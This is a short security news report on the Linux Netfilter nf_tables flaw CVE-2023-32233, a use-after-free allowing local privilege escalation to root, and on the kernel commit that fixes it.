A new Linux NetFilter kernel flaw has been discovered, allowing unprivileged local users to escalate their privileges to root level, allowing complete control over a system. The CVE-2023-32233 identifier has been reserved for the vulnerability, but a severity level is yet to be determined. The security problem stems from Netfilter nf_tables accepting invalid updates to its configuration, allowing specific scenarios where invalid batch requests lead to the corruption of the subsystem’s internal state. Netfilter is a packet filtering and network address translation (NAT) framework built into the Linux kernel that is managed through front-end utilities, such as IPtables and UFW. Corrupting the system’s internal state leads to a use-after-free vulnerability that can be exploited to perform arbitrary reads and writes in the kernel memory. A Linux kernel source code commit was submitted to address the problem by engineer Pablo Neira Ayuso, introducing two functions that manage the lifecycle of anonymous sets in the Netfilter nf_tables subsystem. By properly managing the activation and deactivation of anonymous sets and preventing further updates, this fix prevents memory corruption and the possibility of attackers exploiting the use-after-free issue to escalate their privileges to root level.
